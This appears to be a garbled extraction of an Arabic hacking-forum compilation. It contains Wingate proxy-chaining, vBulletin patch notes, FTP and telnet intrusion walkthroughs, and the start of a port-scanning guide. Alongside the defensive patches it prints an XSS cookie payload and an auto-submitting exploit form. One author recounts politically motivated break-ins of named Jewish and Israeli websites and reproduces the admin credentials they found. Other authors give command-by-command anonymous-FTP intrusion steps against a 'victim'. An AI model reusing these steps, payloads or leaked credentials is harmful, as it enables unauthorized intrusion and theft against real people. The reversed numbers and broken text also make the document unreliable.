>Wingate‬‬ ‫بعدين تقدر تكرر العملیة اكثر من مرة ولكن مع تغییر العنوان يعني كذا‬ ‫‪                                      32 54.99.71.312 >Wingate‬‬ ‫وأيضا اتصل مرة أخرى‪                                              ‬‬ ‫‪                                        32 7.212.56.01 >Wingate‬‬ ‫ألحین بعد ماتتصل بأكثر من ‪ wingate‬اتصل بالموقع‪                  ‬‬ ‫‪                                           WinGate>arbornet.org‬‬ ‫اذا الطريقة وبخطوة سريعة تبدو كذلك‪                                ‬‬ ‫‪                        32 031.911.331.16 C:\Windows> telnet‬‬ ‫‪                                   32 661.371.702.302>Wingate‬‬ ‫‪                                    32 761.81.542.531>Wingate‬‬ ‫‪                                   Wingate>m­net.arbornet.org‬‬ ‫‪                  Connecting to host arbornet.org...Connected‬‬ ‫‪                            842‬‬ ‫طرق حمايه المنتدى‪                         ‬‬ ‫للكاتب‪                                                           HaCkErS:‬‬ ‫لسلم علیكم ورحمه االله حبیت اقدم موضوع سريع حول ترقیع الثغرات الجديده‬ ‫وحمايه منتديات فیبلیوتن‪                                                   ‬‬ ‫اول شيء لزم تضع جدار نارى ( ‪ ( htaccess .‬على مجلد ‪ modcp‬ومجلد‪     ‬‬ ‫‪admincp‬ومجلد‪                                                  includes‬‬ ‫يفضل تغیر اسم ‪ admincp‬و ‪ modcp‬حتى يعصب الوصول الى لوحه التحكم‪   ‬‬ ‫افتح ملف‪                                                      config.php‬‬ ‫الموجود داخل مجلد‪                                              includes‬‬ ‫قم بتعديل اسماء المجلدات‪                                                ‬‬ ‫‪                                              ;'$admincpdir = 'admincp‬‬ ‫(م بتغیر اسم المجلد)‪                                                     ‬‬ ‫‪                                                  ;'$modcpdir = 'modcp‬‬ ‫(م بتغیر اسم المجلد)‪                                                     ‬‬ ‫تروح لم لوحة تحكم الموقع السي بنل واضغط على ايقونه‪                    ‬‬ ‫‪                                            password protect directories‬‬ ‫بعدين يطلع لك مجلدات موقعك حدد مجلد المنتدى‪                           ‬‬ ‫اضغط على مجلد المنتدى‪                                                 ‬‬ ‫ستفتح لك صفحه اخرى اختر المجلد الى تبي حمايته وھو مجلد المنتدى‪    ‬‬ ‫الذي غیرت اسمه اضغط علیه بعدين تفتح صفحة جديدة‪                      ‬‬ ‫حط علمة صح في مربع القفل المغلق ومن ثم اضغط على‪             save‬‬


‫ارجع لنفس الصفحة بالضغط على زر‪                                    back‬‬ ‫الن نقوم بوضع اسم مستخدم وباسورد لحماية مجلد الدمین الجديد‪         ‬‬ ‫افعل ذالك واحفظ عملك‪                                                    ‬‬ ‫‪                                    942‬‬ ‫وكرر العملیه مع المجلد القديم الفارغ‪          admincp , modcp , incldes‬‬ ‫ثغره الھتمل ھي تلقائي مغلقه خاصیه الھ تمل لن الحتیاط واجب تأكد ول‪   ‬‬ ‫تسمح لكواد ھتمل في التواقیع‪                                        ‬‬ ‫ثغره اخر عشر مواضیع نزل مجلد اخر عشر مواضیع وابحث عن ھالكودين‪    ‬‬ ‫الخبیثین‪                                                                ‬‬ ‫‪                                                                   $fsel‬‬ ‫‪                                                                  $ftitle‬‬ ‫احذفھم من الملف وخلص كذا رقعت تمام‪                               ‬‬ ‫ثغرة ملف التعلیمات ‪ faq.php‬وھي ثغره من نوع ‪ Path Disclosure‬الحل احذف‬ ‫ملف ‪ faq.php‬من وجھه نظري ماله داعي‪                               ‬‬ ‫واذا ملزم تبي السئلة الشائعه ادخل ‪                           faq.php‬‬ ‫وابحث عن الكود ھذا‪                                                     ‬‬ ‫‪                                      // initialize some template bits‬‬ ‫‪                                                          ;'' = $faqbits‬‬ ‫‪                                                         ;'' = $faqlinks‬‬ ‫حط تحته مباشرة ھذا الكود‪                                              ‬‬ ‫‪                                      // initialize some template bits‬‬ ‫‪                                                          ;'' = $faqbits‬‬ ‫‪                                                         ;'' = $faqlinks‬‬ ‫ثغره ‪ editpost.php‬معروفه من نوع ‪ CrossSite Scripting‬وھي خاصه لسرقة‪ ‬‬ ‫الكوكیز يقدر المخترق يدخل المنتدى بالكوكیز المسروق‪                   ‬‬ ‫‪                                052‬‬ ‫طريقتي بالترقیع عد السماح بالعضاء بتعديل مواضیعھم وردودھم‪                 ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                    ‬‬ ‫تم اكتشاف ثغرة خطیرة فى منتديات ‪                                        3vb‬‬ ‫ثغرة الرسائل الخاصة‪                                                               ‬‬ ‫الصدارت المصابة ھى ‪                            5.0.37.0.3,6.0.3, 4.0.3 ,30.3‬‬ ‫للتأكد من وجود الثغرة اتبع التي‪                                                  :‬‬ ‫قم بكتابة رسالة جديدة و ضع اسم المستلم و العنوان و في المضمون ضع‪      ‬‬ ‫الكود التالي‪                                                                        :‬‬ ‫‪><Script>javascript:alert(document.cookie);</Script‬‬ ‫طريقة الترقیع ‪- :‬وضعھا اخونا للعندلیب االله يجزاه خیر‪                             ‬‬ ‫افتح ملف‪                                                              private.php‬‬ ‫ابحث عن السطر التالیه‪                                                          :‬‬ ‫‪// trim the text fields‬‬ ‫‪    ;)]'$pm['title'] = trim($pm['title‬‬ ‫‪    ;)]'$pm['message'] = trim($pm['message‬‬ ‫استبدلھا بالتي‪                                                                    :‬‬ ‫‪// trim the text fields‬‬ ‫‪    ;))]'$pm['title'] = trim(xss_clean($pm['title‬‬ ‫‪    ;))]'$pm['recipients'] = trim(xss_clean($pm['recipients‬‬ ‫‪    ;)]'$pm['message'] = trim($pm['message‬‬ ‫‪                                         152‬‬ ‫احفظ الملف وقم برفعه‪                                                     ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                            ‬‬ ‫ثغرة ملف‪ authorize.php ‬وھي ثغره من نوع‪                SQL Injection‬‬


‫ اسمع فیھا الظاھر حقت‬paypal ‫ھو ملف مال امه داعى خاص لشراء وبطاقة‬                                                            ‫شراء من النترنت‬                                          authorize.php ‫ترقیعھا حذف ملف‬                                             ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­                    ‫ جديدة جننت اصحاب المنتديات‬newreply.php ‫ثغره ملف‬               ‫الظاھر ھذه ھي الثغرة اللي جننت اكبر منتديات الھكر العربیة‬                                                      :‫الصدارت المصابة ھي‬                                           VBulletin VBulletin 3.0 Gamma                                            VBulletin VBulletin 3.0 beta 7                                            VBulletin VBulletin 3.0 beta 6                                            VBulletin VBulletin 3.0 beta 5                                            VBulletin VBulletin 3.0 beta 4                                            VBulletin VBulletin 3.0 beta 3                                            VBulletin VBulletin 3.0 beta 2                                                  VBulletin VBulletin 3.0.1                                   Cross­Site Scripting Vulnerability‫و ھي‬  ‫ و الحل السلمي لھا تجديد اصدار المنتدى و‬newreply.php ...‫و الثغرة ھي‬                                                                       ..‫تغییره‬         While a user is previewing the post, both newreply.php and newthread.php do sanitize the input in 'Preview', but Edit­panel does                                    252 not. The result is that malicious HTML code can be injected through this hole. A page as below can lead a visitor to a Preview page that  contains malicious code that performs a cross site scripting attack :                                   html ‫ نحفظه على صفحه‬xss ‫و ھذا كود‬          <form action="http://host/newreply.php" name="vbform"                              method="post" style='visibility:hidden'>                                      <input name="WYSIWYG_HTML"       value="<IMG src="java_script_:alert(document.cookie)">"/>                               <input name="do" value="postreply"/>                                  <input name="t" value="123456" />                                 <input name="p" value="123456" />            <input type="submit" class="button" name="preview"/>                                                                      </form>                                                                      <script>                                           document.all.preview.click();                                                                     </script>                                                     .............................. ‫ملحظة على الجمیع سرعة الترقیة الصدارت الحدث فھو الحل المن لمثل‬                                                                  ‫ھذي الثغرات‬                                            ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­                                                           init.php ‫ثغره ملف‬                                ‫شرح الترقیع اخوانا العندلیب االله يجزاك خیر‬                                                  ‫ بعدين‬init.php ‫حمل ملف‬                                                   ‫إبحث عن السطر التالیه‬                                 $datastoretemp = $DB_site­>query("                                  253                                                         SELECT title, data                                    FROM " . TABLE_PREFIX . "datastore              WHERE title IN ('" . implode("', '", $specialtemplates) . "')


‫;)"‪                                                                           ‬‬ ‫;)‪                                   unset($specials, $specialtemplates‬‬ ‫قم باستبداله بما يلى‪                                                     :‬‬ ‫))‪                                        if(!is_array($specialtemplates‬‬ ‫;‪                                                                         exit‬‬ ‫;)(‪                                             $specialtemplate = array‬‬ ‫)‪                 foreach ($specialtemplates AS $arrykey => $arryval‬‬ ‫{‪                                                                             ‬‬ ‫;)]"‪     $specialtemplate[] = addslashes($specialtemplates["$arrykey‬‬ ‫}‪                                                                             ‬‬ ‫"(‪                                  $datastoretemp = $DB_site­>query‬‬ ‫‪                                                        SELECT title, data‬‬ ‫‪                                   FROM " . TABLE_PREFIX . "datastore‬‬ ‫)'"‪              WHERE title IN ('" . implode("', '", $specialtemplate) . ‬‬ ‫;)"‪                                                                           ‬‬ ‫;)‪               unset($specials, $specialtemplates, $specialtemplate‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                            ‬‬ ‫تم اكتشاف ثغرة امنیة في المنتديات للنسخة ‪ 7.0.3‬وماقبلھا وھذه الثغرة في‬ ‫خاصیة البحث‪                                                               ‬‬ ‫قبل يومین طرحت الشركة تحديث أمني يحل مشكلة في نظام البحث‪      ‬‬ ‫وقد صرحت الشركة بأن ھذا الباتش خاص بالنسخة ‪ 7.0.3‬والصدارات السابقه‬ ‫لقراءة المزيد من التفاصیل‪                                                 ‬‬ ‫‪                                   254‬‬ ‫‪     954331=http://www.vbulletin.com/forum/showthread.php?t‬‬ ‫يرفع الملف الى المجلد ‪ includes‬والموافقه على الستبدال‪            ‬‬ ‫الباتش ھنا‪                                                          ‬‬ ‫‪                   http://azizsoft.hala.cc/soft/functions_search.zip‬‬ ‫ھ ذي بعض طرقي في الحمايه واعترف انھا لیست حمايه كامله الى عنده‬ ‫اضافات يضیف واالله يوفق الجمیع‪                                       ‬‬ ‫‪                              552‬‬ ‫‪256                             anonymous Access‬‬ ‫للكاتب‪                                                                  Fighter:‬‬ ‫دي طريقة بسیطة وسھ لة جدا ومش محتاجة أية تعقیدات بس حبیت أن أكتب‪ ‬‬ ‫عنھا علشان أوضح مدىسھ وله الختراق ( في بعض الحیان ! ) ‪              ..‬‬ ‫وكمان أنا حطیت شوية أمثلة (مواقع يھودية) للتطبیق علیھا‪                   ...‬‬ ‫المھم‪ ،‬طبعا كلكم سمعتم عن ال ‪ anonymous Access‬في ال ‪ ، ftp‬وطبعا‪     ‬‬ ‫قرأتم العشرات من المواضیع عن كیفیة إستغللھا و إزاى (حسبما ھو مكتوب )‪ ‬‬ ‫تقدر أن تحصل على البسوردبكل بساطة من ‪ etc/passwd‬كله كلم إنتھى من‪ ‬‬ ‫زمان وصعب جداالعثور على ‪ host‬أوموقع يسمح لك بالحصول على ملف‪         ‬‬ ‫الباسوردبھذه البساطة ‪                                                       ...‬‬ ‫الطريقة السھلة اللي عاوزأشرحھا ھي تطوير ل ‪ anonymous access‬بس‪      ‬‬ ‫ھذه المرة لختراق بعض المواقع والتي تعمل على الويندوز مش على الیونكس‬ ‫بس زي الطريقة القديمة‪                                                     ...‬‬ ‫أنا إستخدمتھ ا في إختراق عدة مواقع السبوع الي فات ‪ ،‬كرد على المذابح‪     ‬‬ ‫التي وقعت أخیرا في فلسطین ‪ ،‬وبرده كرد على إختراق موقع طريق‪            ‬‬ ‫السلم‪                                                                       ....‬‬ ‫كل الي إنت محتاجه برنامج لل ‪) ftp‬أنا أرشح برنامج ‪ ، ( ws ftp‬وسكانر جید‪    ‬‬ ‫زي ‪ retina‬أو ‪ ) shadow‬ولو كان عندك لینوكس يبقى ‪   satan ، nesus، nmap‬‬ ‫أو‪ ( whisker‬المھم تعال نجرب على الموقع دا‪                                     ‬‬ ‫‪ http://jewishexponent.com‬ودا موقع جريده يھ وديه كبیره تصدر في‪          ‬‬


‫فیلدلفیا‪ ،‬بأمريكا‪ ...‬نعمل شوية سكان علیھم‪ ....‬يا االله ‪ ..‬عندھم ثغرة ‪ ،‬إسمھا‬ ‫‪، anonymous ftp access‬طیب نستفاد منھا إزاي والسرفر بتاعھم ويندوز‪       ‬‬ ‫‪ 0002‬؟‪                                                                           ‬‬ ‫بسیطه نعمل كونكت علیھ م برنامج الف تي بي بتاعنا ‪                         ،‬‬ ‫أو كي عظیم إحنا الن في السرفر بتاعھم بنتفرج علىملفاتھم !!‪                ‬‬ ‫دا كمان عندھم فیلت ‪ ، Asp‬يعني ممكن نتفرج علیھا (دي كارثة كبیره إن‪      ‬‬ ‫ملفات ال ‪ Asp‬يطلع علیھ ا أحد بخلف الدمین ‪ ،‬علشان بكل بساطة ھذه‪       ‬‬ ‫الملفات تحتوي على معلومات حساسة عن كل شىء مكن أن تخیله ‪ ،‬وفي‪   ‬‬ ‫أغلب الحیان الیوزر نیم والباسورد بتاع الدمین) ‪                                ..‬‬ ‫‪                                         752‬‬ ‫طیب فین نلقي الباسورد ؟؟ روح علي الديريكتوري اللي إسمه ‪   ، jeadmin/‬‬ ‫وبعدين ھذا الملف ‪ ، adminLogin.asp‬نزله عندك في جھ ازك أو إفتحه أون لين‬ ‫عن طريق ‪، file preview‬ھتلقي السطر ده ‪                                   :‬‬ ‫‪                                                        then "Y" = if processme‬‬ ‫‪                                                           ("uid")uid = Request‬‬ ‫‪                                                         ("pwd")pwd = Request‬‬ ‫‪                       then "jeLU234rLlsd" = and pwd "jejanette" = if uid‬‬ ‫‪                                                     "true" = ("admin")Session‬‬ ‫عندك الن الوجین نیم بتاع الدمین والباسورد بتاعه في خط واضح مش محتاج‬ ‫تعمل كراك لیه !!! ‪ ،‬وطبعا لو إنت بحثت في الملفات ھناك ھتلقي البیانات و‪ ‬‬ ‫الباسورد بتاع قواعدالبیانات عندھم‪                                           ....‬‬ ‫ونفس الحكاية برضه في ھذا الموقع ‪ www. berale.co.il‬وده بیعمل ويب‪       ‬‬ ‫ھوستینج ‪ ،‬ھتلقي ھناك مواقع كثیره نده زي ‪    ، ruppin.ac.il ، oh­no.co.il‬‬ ‫‪ meretz.org.il ، genie.co.il‬ومواقع كتیر تانیة بس أناماكانش عندي وقعت‪      ‬‬ ‫أشیك علیھم كلھم ‪ ..‬المھم الدمین ھناك قفل ال ‪ ، anonymous ftp access‬‬ ‫بس برضه ھانججیب الباسوورد !!‪                                                ‬‬ ‫الھ وست الرئیسي الرئیسي الي بي بتاعه ‪ 99.53.971.212‬طیب تعال نعمل‪ ‬‬ ‫كونكت على ‪ 001.53.971.212‬وھو ھوست فرعي تابع لنفس الشركة ‪       ..‬‬ ‫ھناك ممكن ندخل بال ‪ ، anonymous‬ونعد نلعب بالفايلت بتاعتھم لغاية ما‪    ‬‬ ‫نجیب الباسوورد الي ھو ‪                              ... Password=tinplH|O‬‬ ‫نرجع تاني لھ وست الرئیسي ونعمل كونكت بس المرة دي بإستخدام ال نیت‪ ‬‬ ‫بايوز بورت ‪ 931‬و اللوجین نیم ‪ administrator‬والباسورد الي معاناه‪             ‬‬ ‫أتمنى ان اكون عرفت ان ابسط الموضوع والشرح ‪                           ...‬‬ ‫وبالھناء والشفاء‪                                                                  ‬‬ ‫‪                                       852‬‬ ‫الختراق عن طريق ال‪                   FTP‬‬ ‫للكاتب‪                                                          Turbo :‬‬ ‫احب ان اوضح فقط ان معظم المرات التي اخترقت بھا عن طريق ال ‪    FTP‬‬ ‫كانتبدون فائدة و ذلك لن الدخول ب ‪ FTP‬يتطلب يوزر نیك و باس و ھذا يحتاج‬ ‫الي كراكر و ل ان تدخل كا زائر و ل يحق لك سحب او ارسال فیلت‪         ‬‬ ‫و كأنك يا ابو زيد ما غازيت‪                                                ‬‬ ‫فارجو من كل المھتمین بالموضوع المشاركة للتعلم و نشر الفائدة‪          ‬‬ ‫أول و لنجاح القتحام يجب ان يكون لدى الضحیة البورت‪                    ‬‬ ‫‪                                                                        12‬‬ ‫مفتوح و ھو البورت الخاص بال‪                                       FTP‬‬ ‫و لتأكد من أن البورت مفتوح علیك ان تستعمل برامج السكان و ھي كثیرة و‬ ‫من اھمھا‪                                                               ‬‬ ‫‪                                                          Superscanne‬‬ ‫بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانیة و ھي‪               ‬‬ ‫إضغط على‪                                                              ‬‬


‫‪                                                                     Start‬‬ ‫ثم‪                                                                        ‬‬ ‫‪                                                                      Run‬‬ ‫ثم اكتب‪                                                                  ‬‬ ‫‪                                                                    ftp ­n‬‬ ‫سوف تطلع لك نافدة في الدوس مكتوب علیھا‪                            ‬‬ ‫‪                                                                    >FTP‬‬ ‫ؤوكي لحد ھنا كل شيء تمام‪                                          ‬‬ ‫و بعدين اكتب‪                                                           ‬‬ ‫‪                                                                    Open‬‬ ‫ثم إضغط على‪                                                          ‬‬ ‫إدخال‪                                                                    ‬‬ ‫‪                                                                    Enter‬‬ ‫سوف تتحصل عب النتیجة التالیة‪                                        ‬‬ ‫‪                                                                    >FTP‬‬ ‫‪                                                                       To‬‬ ‫‪                                 952‬‬ ‫أكتب بجانب‪                                                                    ‬‬ ‫‪                                                                            To‬‬ ‫رقم البي للضحیة ثم إضغط على إدخال‪                                      ‬‬ ‫و الن خد بالك معي‪                                                          ‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪                                  ‬‬ ‫‪                                          Connected to www.assassin.com‬‬ ‫‪                         .)0.4 220 websrv1 Microsoft FTP Service (Version‬‬ ‫و الن أكتب الكتابة التالیة‪                                                   ‬‬ ‫‪                                                          ftp>quote user ftp‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪                                  ‬‬ ‫‪          331 Anonymous acces allowed, send identify (e­mail name) as‬‬ ‫‪                                                                    .password‬‬ ‫و الن أكتب الكتابة التالیة‪                                                   ‬‬ ‫‪                                                      ftp>quote cwd ~root‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪                                  ‬‬ ‫‪                                    530 Please login with USER and PASS‬‬ ‫ثم أكتب الكتابة التالیة‪                                                        ‬‬ ‫‪                                                         ftp>quote pass ftp‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪                                  ‬‬ ‫و نجحت في القتحام‪                                                         ‬‬ ‫‪                                           .230 Anonymous user logged in‬‬ ‫مبروك أنت الن في جھاز الضحیة‪                                             ‬‬ ‫ما علیك الن ال ان تقوم بإستعمال‪                                           ‬‬ ‫اوامر الفتیبي‪                                                                  ‬‬ ‫و طبعا لن امر علیھ ا مرور الكرام لكي ل تقعو في المشكلة الي وقعت فیھا و‪   ‬‬ ‫ھي نجاح القتحام من دون ما أعرف و ل فكرة على اوامر الفتیبي و إدا اردتم ان‬ ‫تضحكو بقالیأكثر من ‪ 02‬دقیقة و انا مجمد اليدي و الضحیة عالقة من دون أن‪  ‬‬ ‫أعمل أي شيء و لھدا‪                                                       ‬‬ ‫قمت بحتضیر الوامر لكي تطبقوھ ا مباشرةا بعد نجاح القتحام‪                 ‬‬ ‫‪                                                                          Pwd‬‬ ‫لكي تعر ما يحتويه الھارد ديسك‪                                              ‬‬ ‫‪                                                                           Cd‬‬ ‫‪                                     062‬‬


‫لقتحام مجلد مثال‬                                                               Cd black                         ‫في ھ دا المثال قمت بإقتحام مجلد المسمى بلك‬                                                                      Ls                             ‫لكي يتضح لك محتوى المجلد أو الھارد ديسك‬                                                                    Get                                 ‫لكي تحمل الى سطح المكتب بتاع جھازك‬                                                                    ‫مثال‬                                                          Get black.exe                                                                     Put                                                      ‫العملیة العكسیة ل‬                                                                     Get              ‫يعني ان تأخد ملف من سطح المكتب بتاع جھازك و تضعه في‬                                                        ‫في جھاز الضحیة‬                                                                    ‫مثال‬                                                          Put black.exe                                                                  Close                                                 ‫لقطع التصال مع الضحیة‬ ‫ھدي أھ م الوامر و الن سون تطرق على أنواع الرسائل الي نتحصل علیھا من‬                         ‫جھ از الضحیة أثناء تطبیق الوام و شرحھا و ارقامھا‬                                                   Codes: Signification:                                             110 Restart marker reply.                120 Service ready in nnn minutes. (nnn est un temps)                 125 Data connection already open; transfer starting.                 150 File status okay; about to open data connection.                                                   200 Command okay.             202 Command not implemented, superfluous at this site.                              211 System status, or system help reply.                                                  212 Directory status.                                                        213 File status.                                                    214 Help message.                                               215 NAME system type.                                       220 Service ready for new user.                                221 Service closing control connection.                                   261                    225 Data connection open; no transfer in progress.                                           226 Closing data connection.                    227 Entering passive mode (h1, h2, h3, h4, p1, p2).                                           230 User logged in, proceed.                             250 Requested file action okay, completed.                                              257 "PATHNAME" created.                                  331 User name okay, need password.                                            332 Need account for login.                  350 Requested file action pendingfurther information.                   421 Service not available, closing control connection.                                        425 Can't open data connection.                              426 Connection closed; transfer aborded.      450 Requested file action not taken. (Fichier déjà utilisé par autre                                                                    chose)                  451 Requested action aborded: local error processing.


‫‪452 Requested action not taken. (Pas assez de mémoire pour exécuter‬‬ ‫)‪                                                                 l'action‬‬ ‫‪                            500 Syntax error, command unrecognized.‬‬ ‫‪                        501 Syntax error in parameters or arguments.‬‬ ‫‪                                      502 Command not implemented.‬‬ ‫‪                                      503 Bad sequence of commands.‬‬ ‫‪                   504 Command not implemented for that parameter.‬‬ ‫‪                                                      530 Not logged in.‬‬ ‫‪                                     532 Need account for storing files.‬‬ ‫‪      550 Requested action not taken. (Fichier non trouvé, pas d'accès‬‬ ‫)‪                                                              possible,...‬‬ ‫‪                  551 Requested action aborded: page type unknown.‬‬ ‫‪                                    552 Requested file action aborded.‬‬ ‫)‪         553 Requested action not taken. (Nom de fichier non attribué‬‬ ‫و الن أرجو ان اكون قد نجحت في شرح ھده الطريقة على فكرة ھده الطريقة‪ ‬‬ ‫يمكن ان تستعمل لقتحام موقع كما تستعمل لقتحام جھاز‪                 ‬‬ ‫‪                                  262‬‬ ‫الختراق عن طريق التلنت‪                   ‬‬ ‫للكاتب ‪                                                   Mega_Egypt:‬‬ ‫ماھو التلنت؟‪                                                            ‬‬ ‫كیفیة تشغیل التلنت؟‪                                                   ‬‬ ‫ما ھ ي بعض الوامر المستخدمة في التلنت؟‪                             ‬‬ ‫خاتمة‪                                                           ..........‬‬ ‫ماھو التلنت‪                                                            :‬‬ ‫ھو عبارة عن أداة يتم تحمیلھا مع الويندوز وبواسطة ھذه الداه يتم التصال‪ ‬‬ ‫بین جھ ازين عن طريق بورت معین‪                                         ‬‬ ‫كیفیة تشغیل التلنت‪                                                   :‬‬ ‫روح لـ ‪                             Start­­­­­­­­­à Run­­­­­­­­­àTelnet‬‬ ‫ھیفتحلك واجھه البرنامج ھتروح لـ ‪     Connect ­­­­­­­­àRemote System‬‬ ‫ھتكتب في خانة ‪ FTP.victim.com Host Name‬طبعا بدل ‪ victim‬اكتي اسم‬ ‫الموقع من غیر ‪                                                   WWW‬‬ ‫جینا للنقطة المھمة وھي خانة ‪ Port‬انت طبعا قبل كل حاجة المفروض انك‪ ‬‬ ‫عامل ‪ Scanner‬على موقع الضحیة وعارف ايه المنافذ المفتوحة وھديك‪     ‬‬ ‫دلوقتي ارقام النافذ‪                                                    :‬‬ ‫‪                        21ß­­­­­­­­­­­ FTP‬‬ ‫‪                       23< ­­­­­­­­­Telnet‬‬ ‫‪                       25 <­­­­­­­­­­­smtp‬‬ ‫‪                       43 ­­­­­­­­­­<whois‬‬ ‫‪                       80<­­­­­­­­­­­­ http‬‬ ‫‪                       3110 <­­­­­­­­­­pop‬‬ ‫‪                       143<­­­­­­­­­­­ Imap‬‬ ‫المھم تكتب في خانة ‪ 21Port‬وده بورت ‪FTP‬ھیطلعلك رسالة تفیدك بان‪   ‬‬ ‫السیرفر جاھز‪                                                           ‬‬ ‫طیب دلوقتي عايزين ندخل للسیرفر ھنجیب يوزر وباسوورد منین‪           ‬‬ ‫متقلقش ھندخل في وضع التخفي شوف الطريقة دي ھتكتب الكلم اللى‪  ‬‬ ‫ھقلھولك بس نش ھتشوف اللى بتكتب‪                                  ‬‬ ‫‪                                 362‬‬ ‫اكتب‪                                                                             ‬‬ ‫‪ User anonymous‬وبعدين اضغط انتر ھیطلعلك الرسالة دي‪                     ‬‬ ‫‪   331 Guest login Ok, Send your complete e­mail address as password‬‬


‫بھد كده ھتكتب ‪                                                     Pass @yahoo‬‬ ‫طبعا ممكن تدي ايمیلك وممكن تدي اي حاجة فیھا رمز @‪                       ‬‬ ‫بعد كده ھیديك‪                                                                   ‬‬ ‫‪) 230 Logged in Anonymously‬بتتغیر على حسب نوع السیرفیر)‪            ‬‬ ‫خلص ابسط على الخر احنا دلوقتي في السیرفیر لكن احنا عايزين نعمل‪      ‬‬ ‫وصله عن طريق المر ‪                                                        PASV‬‬ ‫ھیطعلك ‪ IP‬الموقع وبعد الـ ‪ Ip‬ھ تلقي آخر خانتین ودي خانة البورت وھنعمل‬ ‫دلوقتي عملیه حسابیه علشان نطلع البورت اللى ھندخل منه وھي نجیب‪    ‬‬ ‫الخانة لولي من خانة البورت نضربھا في ‪ 652‬والناتج يتجمع علیه الخانة التانیة ‪.‬‬ ‫مثال (‪ )21,02,52,425,45,402‬ھنعمل العملیه دي ‪        65220x+21= 2315‬‬ ‫ھتفتح خانة ‪Telnet‬جديده بعد كده تكتب في خانة ‪                Host Name‬‬ ‫‪ FTP.Victim.com‬وبدل ‪ Victim‬اكتب اسم الموقع واكتب في خانة ‪Port 2315‬‬ ‫طبعا في الخانة الولى تدخل المر وفي الخانة التانیه‪                             ‬‬ ‫ھیطله الناتج وھ یتم قطه التصال في النافذه التانیه بعد اي امر تروح للخانة‪    ‬‬ ‫الولى ودخل امر ‪ PASV‬تعمل العملیه الحسابیه وتفتح ‪Telnet‬جديد وتدخل‪    ‬‬ ‫اسم والبورت الجديد وطبعا بعد كدة معدش فیه حاجة غیر الامر‪                  ‬‬ ‫بعض الوامر المستخدمة في التلنت‪                                               :‬‬ ‫‪Lest‬لستعراض كل ما على السیرفر‪                                               ‬‬ ‫‪ Get‬لسحب اي ملف من على السیرفیر‪                                          ‬‬ ‫‪ Dir‬لعرض المفات التي على السیر فر‪                                             ‬‬ ‫‪ Cd‬للنتقال بین الملفات‪                                                           ‬‬ ‫‪ Cd..‬للرجوع الى الدلیل الذي يعلو الملف المتواجد فیه حالیا‪                      ‬‬ ‫‪ Send‬لرسال اي ملف للسیرفیر وھ ناك اوامر كتییره حاول تجربھا‪                 ‬‬ ‫‪ Put‬لوضع ملف معین على السیرفر‪                                                 ‬‬ ‫‪ Pwd‬لمعرفة الدلیل المتواجد فیه انا على السیرفر‪                                ‬‬ ‫‪ Rename‬لتغیر اسماء ملفات على السیرفر‪                                        ‬‬ ‫‪  Rmdir‬لجذف ملف معین من السیر فر‪                                              ‬‬ ‫‪ Mkdir‬لعمل ملف جديد على السیرفر‪                                              ‬‬ ‫‪                                          462‬‬ ‫الخاتمة‪                                       :‬‬ ‫أشكركم جمیعا واشكر ‪ The oNe‬فكتابه كان عون لیه‬ ‫وتقبلوا تحیات ‪                       mr_Shark96‬‬ ‫‪                             BrUtE HaCk Team‬‬ ‫أي استفسارات ارجو مراسلتي على‪               ‬‬ ‫‪                 Mega_Egypt2003@yahoo.com‬‬ ‫‪          562‬‬ ‫اختراق المواقع‪                                ‬‬ ‫كیف أجمع معلومات حول موقع ?‪                                              ‬‬ ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‪                     ‬‬ ‫أول خطوه تصلحھا ھ ي بورت سكان ? أنصحك تستخدم ‪ nmap‬المشھوره‪      ‬‬ ‫والقواء على الطلق‪،‬يمكن أن تبحث عنھا ھذا إذا ما لقیتھا في الموقع‪        ‬‬ ‫‪ http://www.inscure.org/nmap‬وھ ي تعمل على نظام لیونكس ? إذا أردت‪   ‬‬ ‫برنامج يعمل على ويندوز انصحك بـ ? ‪ SuperScan‬علیك البحث عنھا في‪       ‬‬ ‫النترنت ? سوف تجد آلف المواقع التي تقدمھ ا لتنزيل ? ومن الممكن أن‪      ‬‬ ‫تستخدم نصوص ‪ Perl‬لعملیه البحث ? لغه ‪ Perl‬أصبحت اللغه محبوبه لدى‪     ‬‬ ‫جمیع الھاكر بعد ‪                                                             C‬‬ ‫بعد الحصول على النتائج ? مثل نصلح تجربه على الموقع‪                      ‬‬ ‫‪  http://www.7lem.com/‬بعض برامج البحث تطلب وضع رقم الي بي للموقع ?‬ ‫ولتقبل الدوماين عندھا إستخدم ‪ ping‬لتعرف رقم الي بي (‪                   ‬‬ ‫تأتي النتائج ? البورتات (‪   - 415 - 315 - 341 - 011 - 73 - 52 - 32 - 22 - 12‬‬


‫‪ )785‬ويوجد منافذ أخرى لكن لن نھتم لھا ھنا ? نقوم بعملیه نزع التواقیع‪      ‬‬ ‫للمنافذ ‪                                                                      ...‬‬ ‫ماھي عملیه نزع التواقیع للمنافذ؟‪                                            ‬‬ ‫من المعروف أن المنفذ فتح من قبل تطبیق ? عند التصال بھذا المنفذ فسوف‪  ‬‬ ‫يتم إرجاع رد الیك ? مثل لو إتصلت بالبورت ‪ 32‬وھو لتلنت ? وموقع‪              ‬‬ ‫‪ http://www.7lem.com/‬توجد به خدمه تلنت ? ويتضح ھذا من عملیه مسح‪  ‬‬ ‫المنافذ ?التصال بخدمه اتلنت‪                                                 ‬‬ ‫‪                                              http://www.7lem.com/telnet‬‬ ‫يتم تنفیذ المر التالي في ‪ Windows‬و ‪ Linux‬و ‪ SunOS‬و ‪ FreeBSD‬و ‪    QNX‬‬ ‫بنفس الصیغه ? ولكن أفضل ‪ Linux‬عنھا ? وھ و لن لینكس يوفر كل ماتحتاجه‪  ‬‬ ‫من أدوات ‪...‬ھ ذا المستند ل يختص بـ ‪ Linux‬لذلك لن أذكرھا ? تأتي نتیجه‪     ‬‬ ‫التصال بسیرفر الحلم على بورت التلنت‪                                       ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪                                                          ‬‬ 